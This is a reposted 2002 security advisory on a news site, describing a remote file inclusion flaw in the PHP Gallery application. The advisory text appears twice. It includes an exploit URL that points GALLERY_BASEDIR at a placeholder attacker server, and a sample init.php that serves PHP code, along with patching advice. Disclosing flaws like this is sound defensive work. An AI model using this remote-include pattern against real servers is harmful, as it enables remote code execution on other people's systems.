HNS MAIN FEED
Tuesday, 14:48 EST
- OpenDNSSEC 1.0.0 released
- Microsoft releases giant patch collection
- 81% percent of e-mail links to malware
- Unaware of the dangers, most teens share personal info online
- Data harvested from Facebook used in boiler room scams
- A closer look at USB Secure 1.3.0
- Safety tips for online dating
- Researcher hacks security encryption chip found on millions of PCs
- Is authenticated XSS a problem?
- Online shopping safety: Consumers hold retailers responsible
- Seagate ships the Savvio 10K.4 hard drive
- Political hacktivism and the exploitation of tragedies is on the rise
PHP Gallery Code Injection Vulnerability
06 August 2002
From: avart@gmx.de
Hi!
Code injection in gallery
# What is gallery?
The Gallery is actually the best web gallery application around in the world. I'm using it too ;-). Go to <http://gallery.sf.net/>; to get further information and download this very cool app.
#### remote include problems ####
# Problem description
There are several include statements that includes a variable without checking it. A administrator of PowerTech (an ISP in Norway) discovered this problems.
You're able to inject foreign code into the application (if allow_url_fopen is turned on).
Example code:
errors/configmode.php
[...]
<? require($GALLERY_BASEDIR . "errors/configure_instructions.php") ?>
[...]
# How can I exploit the code?
Use this
line:
http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/
On http://your.evil.server.tdl/ you place a file called init.php that puts out nasty php-code.
The file could look like this:
init.php:
<?php
echo "<?php phpinfo(); ?>";
?>
# And the solution?
Go
to
<http://gallery.menalto.com/modules.php?op=modload&name=News&file=
article&sid=50&mode=thread&order=0&thold=0> to see how to solve the problem.
# Why do you post this problem again?
Because the author of the announcement on the gallery website said: An alternative to doing a full upgrade is to patch the files that contain the security fix. This is relatively easy to do. All you need to do is edit these files:
errors/configmode.php
errors/needinit.php
errors/reconfigure.php
errors/unconfigured.php
That's not absolutely right...you have to patch the file: captionator.php too!
Hope it's fixed in new releases :).
PS: Their website is now updated.
##### Credits #####
For the german-speaking folk: <http://bluephod.net/>;
Noncredit: florg, thank you for turning off the whole website! :/
Hi!
Code injection in gallery
# What is gallery?
The Gallery is actually the best web gallery application around in the world. I'm using it too ;-). Go to <http://gallery.sf.net/>; to get further information and download this very cool app.
#### remote include problems ####
# Problem description
There are several include statements that includes a variable without checking it. A administrator of PowerTech (an ISP in Norway) discovered this problems.
You're able to inject foreign code into the application (if allow_url_fopen is turned on).
Example code:
errors/configmode.php
[...]
<? require($GALLERY_BASEDIR . "errors/configure_instructions.php") ?>
[...]
# How can I exploit the code?
Use this
line:
http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/
On http://your.evil.server.tdl/ you place a file called init.php that puts out nasty php-code.
The file could look like this:
init.php:
<?php
echo "<?php phpinfo(); ?>";
?>
# And the solution?
Go
to
<http://gallery.menalto.com/modules.php?op=modload&name=News&file=
article&sid=50&mode=thread&order=0&thold=0> to see how to solve the problem.
# Why do you post this problem again?
Because the author of the announcement on the gallery website said: An alternative to doing a full upgrade is to patch the files that contain the security fix. This is relatively easy to do. All you need to do is edit these files:
errors/configmode.php
errors/needinit.php
errors/reconfigure.php
errors/unconfigured.php
That's not absolutely right...you have to patch the file: captionator.php too!
Hope it's fixed in new releases :).
PS: Their website is now updated.
##### Credits #####
For the german-speaking folk: <http://bluephod.net/>;
Noncredit: florg, thank you for turning off the whole website! :/